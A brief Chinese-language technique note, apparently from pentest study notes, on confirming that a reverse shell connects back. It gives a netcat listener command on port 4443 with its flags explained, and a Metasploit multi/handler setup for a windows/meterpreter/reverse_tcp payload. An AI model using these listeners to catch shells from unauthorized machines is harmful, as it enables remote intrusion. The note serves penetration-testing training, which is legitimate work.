技法笔记3 | 验证交互式shell连接
用于验证是否能接受到reverse shell的工具:netcat, msfconsole
1. netcat
基础方法:使用nc监听Payload设置的目标端口验证
sudo nc -lvp 4443
参数
- -l:表示使用的是监听模式
- -p:指定监听的端口号
- -v:表示启用详细模式verbose,会输出更多的调试信息
2. msfconsole
msfvenom生成的payload通常需要使用Metasploit的multi/handler来处理(格式、编码原因,nc无法处理)
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4443
exploit
- LHOST设置为0.0.0.0或本地IP
- LPORT设置为4443